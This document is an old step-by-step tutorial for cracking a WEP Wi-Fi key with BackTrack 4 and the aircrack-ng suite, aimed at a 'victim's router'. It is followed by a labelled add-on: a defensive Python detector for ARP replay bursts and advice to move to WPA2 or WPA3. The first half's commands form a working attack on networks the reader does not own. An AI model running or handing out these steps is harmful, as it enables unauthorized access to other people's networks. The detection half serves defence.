*Disclaimer: This is for educational purposes; if you get caught doing this, it's your own fault.*
You will need BackTrack 4. Next, you will need to burn it onto a CD. If you don't know how to do that, then just stop right now.
Login: root
Password: toor
Once logged in, type: "startx"
1. Open the console and type in this to start network connections:
/etc/init.d/networking start
2. Now you will put the network card into monitor mode:
airmon-ng
3. Now to start the scan (Note: use either wlan0 or wlan1):
airmon-ng start wlan0
4. Time to spoof your MAC address with:
ifconfig wlan1 down
macchanger -r wlan1
ifconfig wlan1 up
5. Now to find your victim's router:
airodump-ng mon0
6. Once you've found one, copy the BSSID and get out of airodump with:
airodump-ng -c "channel number" --bssid "The BSSID of the router" -w "What you want to save the cap file as" mon0
Example:
airodump-ng -c 1 --bssid 11:22:33:44:55:66 -w wepcap mon0
7. Now to start cracking:
aireplay-ng -1 1 -a "The BSSID of the router" mon0
Example:
aireplay-ng -1 1 -a 11:22:33:44:55:66 mon0
8. To continue the ARP cycle, open another console and type:
aireplay-ng -3 -b "The BSSID of the router" mon0
Collect a large number of IVs, between 20,000 and 50,000.
9. To crack the cap, open another console and type:
aircrack-ng -b "The BSSID of the router" "File Name"-01.cap
Example:
aircrack-ng -b 11:22:33:44:55:66 wepcap-01.cap
10. You should now have the key for the router, enjoy.
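Seen from the network owner's side, the ARP cycle in step 8 is noisy: one station sends a sustained burst of same-length broadcast frames. The following is an added example, not part of the original tutorial, of a sliding-window check a wireless monitoring sensor could run; the record layout, MAC addresses, window and threshold are all assumptions, and the sample frames are constructed. Because WEP encrypts the payload, the check keys on frame length and broadcast destination rather than on packet contents.

```python
from collections import defaultdict

BROADCAST = "ff:ff:ff:ff:ff:ff"

def build_sample():
    """Constructed sensor records: (time_ms, transmitter, destination, frame_len)."""
    frames = []
    for i in range(10):      # ordinary client: sparse broadcasts, varying length
        frames.append((i * 1000, "02:00:00:00:00:01", BROADCAST, 68 + (i % 3) * 20))
    for i in range(600):     # replay-like station: one frame every 3 ms, same length
        frames.append((3000 + i * 3, "02:00:00:00:00:02", BROADCAST, 68))
    for i in range(600):     # busy unicast transfer: high rate but not broadcast
        frames.append((3000 + i * 3, "02:00:00:00:00:03", "02:00:00:00:00:fe", 1500))
    return frames

def detect_replay(frames, window_ms=1000, threshold=100):
    """Return {transmitter: peak} for stations sending at least `threshold`
    same-length broadcast frames inside any `window_ms` span.
    window_ms and threshold are assumed values; tune them per network."""
    times_by_key = defaultdict(list)
    for ts, src, dst, length in frames:
        if dst == BROADCAST:
            times_by_key[(src, length)].append(ts)
    alerts = {}
    for (src, _length), times in times_by_key.items():
        times.sort()
        start = peak = 0
        for end, ts in enumerate(times):
            while ts - times[start] > window_ms:   # slide the window forward
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts[src] = max(alerts.get(src, 0), peak)
    return alerts

if __name__ == "__main__":
    for station, peak in detect_replay(build_sample()).items():
        print(f"ALERT possible ARP replay: {station} sent {peak} identical broadcasts in 1 s")
```

An alert like this is a stopgap; moving the access point from WEP to WPA2 or WPA3 removes the weakness the steps above rely on.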